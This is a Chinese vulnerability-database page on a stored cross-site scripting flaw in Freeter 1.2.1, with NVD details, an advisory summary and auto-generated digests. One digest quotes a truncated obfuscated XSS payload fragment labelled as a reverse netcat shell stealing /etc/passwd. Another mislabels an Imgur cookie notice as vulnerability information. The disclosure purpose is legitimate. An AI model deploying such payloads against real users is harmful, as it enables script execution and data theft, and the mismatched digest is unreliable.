支持本站 — 捐款将帮助我们持续运营

目标:1000 元,已筹:736

73.6%
立即捐款
一、 漏洞 CVE-2021-47835 基础信息
漏洞信息
                                        # Freeter 1.2.1 持久性XSS漏洞

N/A
神龙判断

是否为 Web 类漏洞: 未知

判断理由:

N/A
提示
尽管我们采用了先进的大模型技术,但其输出仍可能包含不准确或过时的信息。
神龙会尽力确保数据准确,但也请结合实际情况进行甄别与判断。
神龙祝您一切顺利!
漏洞标题
Freeter 1.2.1 - Persistent Cross-Site Scripting
来源:美国国家漏洞数据库 NVD
漏洞描述信息
Freeter 1.2.1 contains a persistent cross-site scripting vulnerability that allows attackers to store malicious payloads in custom widget titles and files. Attackers can craft malicious files with embedded scripts that execute when victims interact with the application, potentially enabling remote code execution.
来源:美国国家漏洞数据库 NVD
CVSS信息
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
来源:美国国家漏洞数据库 NVD
漏洞类别
在Web页面生成时对输入的转义处理不恰当(跨站脚本)
来源:美国国家漏洞数据库 NVD
二、漏洞 CVE-2021-47835 的公开POC
#POC 描述源链接神龙链接
三、漏洞 CVE-2021-47835 的情报信息

  • 标题: Freeter 1.2.1 - Persistent Cross-Site Scripting - Multiple webapps Exploit -- 🔗来源链接

    标签:exploit

    神龙速读:
                                            ### 关键信息

- **漏洞标题**: Freeter 1.2.1 - Persistent Cross-Site Scripting
- **EID-ID**: 49833
- **漏洞作者**: TaurusOmar
- **漏洞类型**: WEBAPPS
- **平台**: MULTIPLE
- **日期**: 2021-05-05
- **CVE编号**: N/A
- **CVSS评分**: 8.8 (高风险)
- **厂商主页**: https://freeter.io/
- **版本**: 1.2.1
- **测试平台**: Windows, Linux, MacOS

### 攻击载荷示例

```markdown
# Payload 2: exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc)

<audio src=x onerror=writeln(String.fromCharCode(10,60,97,117,100,105,111,32,115,114,99,61,120,32,111,110,101,101,114,114,99,61,120,32,111,116
```

### 描述

This is an XSS exploit against Freeter 1.2.1, allowing an attacker to execute arbitrary JavaScript code on the target's browser, potentially leading to unauthorized actions such as stealing sensitive information or controlling the user's session.
    Freeter 1.2.1 - Persistent Cross-Site Scripting - Multiple webapps Exploit

  • 标题: - GIF - Imgur -- 🔗来源链接

    标签:exploit

    神龙速读:
                                            - Page: Imgur
- Date: May 5, 2021
- Views: 218

### Key Vulnerability Information

- **Personal Data Usage**
  - Personalised advertising and content
  - Advertising and content measurement
  - Audience research and services development
  - Store and/or access information on a device

- **Data Processing**
  - Personal data will be processed and information from your device (cookies, unique identifiers, and other device data) may be stored, accessed, and shared.
  - Involved parties: 168 TCF vendors and 80 ad partners.

- **Options**
  - Users can manage or withdraw consent in privacy and cookie settings.
    - GIF - Imgur

  • 标题: The Organizer for Those Who Do — Freeter -- 🔗来源链接

    标签:product

    神龙速读:
                                            从这个网页截图中未直接显示任何关于漏洞的关键信息。该网页主要介绍了Freeter应用程序的功能和特点,包括其工作流管理、项目组织、窗口小部件、隐私保护等。如果需要查找漏洞信息,请提供更具体的上下文或检查相关的安全公告和漏洞报告。
    The Organizer for Those Who Do — Freeter

  • 标题: Freeter 1.2.1 - Persistent Cross-Site Scripting | Advisories | VulnCheck -- 🔗来源链接

    标签:third-party-advisory

    神龙速读:
                                            ## 关键漏洞信息

- **漏洞名称**: Freeter 1.2.1 - Persistent Cross-Site Scripting
- **严重程度**: Medium
- **日期**: January 16, 2026
- **影响版本**: Freeter 1.2.1
- **CVE参考号**: CVE-2021-47835
- **CVE描述**: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
- **CVSS评分**: 4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N
- **相关链接**:
  - [ExploitDB-49833](#)
  - [Official Freeter Product Homepage](#)
  - [Proof of Concept Video](#)
- **发现者**: TaurusOmar
- **漏洞描述**:
  Freeter 1.2.1 存在持久性跨站脚本漏洞,允许攻击者在自定义小部件标题和文件中存储恶意payload。攻击者可以创建带有嵌入脚本的恶意文件,当受害者与应用程序交互时,脚本会执行,潜在地启用远程代码执行。
    Freeter 1.2.1 - Persistent Cross-Site Scripting | Advisories | VulnCheck
  • https://nvd.nist.gov/vuln/detail/CVE-2021-47835
四、漏洞 CVE-2021-47835 的评论

暂无评论

发表评论